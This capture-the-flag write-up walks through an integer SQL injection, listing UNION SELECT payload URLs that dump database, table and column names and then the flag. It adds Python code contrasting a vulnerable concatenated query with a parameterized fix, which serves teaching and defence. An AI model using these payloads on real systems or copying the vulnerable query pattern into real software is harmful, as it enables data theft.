SQL Injection - INT

Enter 1 and click search; the page displays the SQL statement.
Testing with order by shows that there are two output positions.
Enter the following to see where the output is displayed:

http://81.70.245.6:50282/?id=-1 UNION SELECT 1,2

Enter the following to query the database names:

http://81.70.245.6:50282/?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata

Enter the following to query the table names:

http://81.70.245.6:50282/?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

Enter the following to query the column names:

http://81.70.245.6:50282/?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name='flag'

Enter the following to retrieve the flag value:

http://81.70.245.6:50282/?id=-1 UNION SELECT 1,flag from flag
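
Why the payloads above work and how to close the hole, as an added example that is not part of the original write-up: the same integer-context query built by string concatenation, next to a validated and parameterized version. SQLite stands in for the challenge's MySQL backend, and the news table, the function names and the flag value are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; SQLite is an assumed stand-in for MySQL.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, data TEXT);
        INSERT INTO news VALUES (1, 'hello');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('flag{constructed-sample}');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # Integer context: the value is not quoted, so no quote is needed to
    # break out. Everything after the number is parsed as SQL.
    sql = "SELECT id, data FROM news WHERE id=" + raw_id
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # Layer 1: accept only a plain decimal integer.
    if not re.fullmatch(r"-?[0-9]{1,9}", raw_id):
        raise ValueError("id must be an integer")
    # Layer 2: bind the value, so it is never part of the SQL text.
    sql = "SELECT id, data FROM news WHERE id=?"
    return db.execute(sql, (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Payloads taken from the write-up's id parameter.
    for raw in ["1", "-1 UNION SELECT 1,2", "-1 UNION SELECT 1,flag from flag"]:
        print("input     :", raw)
        print("vulnerable:", lookup_vulnerable(db, raw))
        try:
            print("hardened  :", lookup_hardened(db, raw))
        except ValueError as exc:
            print("hardened  : rejected,", exc)
```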


XSS - Stored
